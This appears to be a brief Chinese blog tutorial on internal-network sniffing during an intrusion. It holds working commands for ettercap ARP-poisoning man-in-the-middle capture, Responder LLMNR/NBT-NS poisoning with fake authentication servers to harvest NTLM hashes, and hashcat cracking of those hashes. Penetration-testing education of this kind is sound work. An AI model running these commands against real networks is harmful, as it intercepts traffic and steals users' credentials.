浅谈内网嗅探
当我们进入内网时,很多时候是没有任何凭据的,在没有凭据的情况下,嗅探就成了一种有效且可行的操作手段。
ettercap
ettercap是非常经典也非常有代表性的嗅探工具,虽然有的时候动静会很大,但是只要运用得当,它就是一把不见血的杀猪刀。
0x01 嗅探指定网段明文数据
1 | ettercap -Tqi eth0 -M arp:remote //172.22.35.0/24// |
0x02 嗅探指定网段网络认证中的明文数据
1 | ettercap -T -q -i eth0 -L webadmin -M arp:remote //172.22.35.0/24// |
0x03 嗅探本地指定端口明文数据
1 | ettercap -i eth2 -T -q -p -l local //25,80,110,143,8080 |
只可惜成功率偏低,一个小时什么都没抓到。
responder
Responder可以毒化LLMNR,NBT-NS和MDNS,具有内置的HTTP/SMB/MSSQL/FTP/LDAP虚假的身份验证服务器,支持NTLMv1/NTLMv2/LMv2,扩展安全性NTLMSSP和基本HTTP身份验证。
- responder可以说是无中生有的神器了,甚至可以在用户没有输入账号密码的情况下,抓取到NTLM加密的哈希值,并且动静较小,难以察觉。
0x01 攻击机伪装为web代理服务器,应答内网所有数据。
1 | responder -I eth0 -wfrv |
并且在用户连接到不存在的地址时,responder如同其名一样,会欺骗性的返回认证窗口。
最后抓到的哈希值用hashcat破解。
1 | hashcat -m 5600 ******** /root/weak_passwds_v1.txt -o found.txt --force |
所有抓到的数据都会自动保存到/usr/share/responder/logs目录。
一个小时内有10条有效数据,效果还是很好的,更巧的是empire已经内置了responder。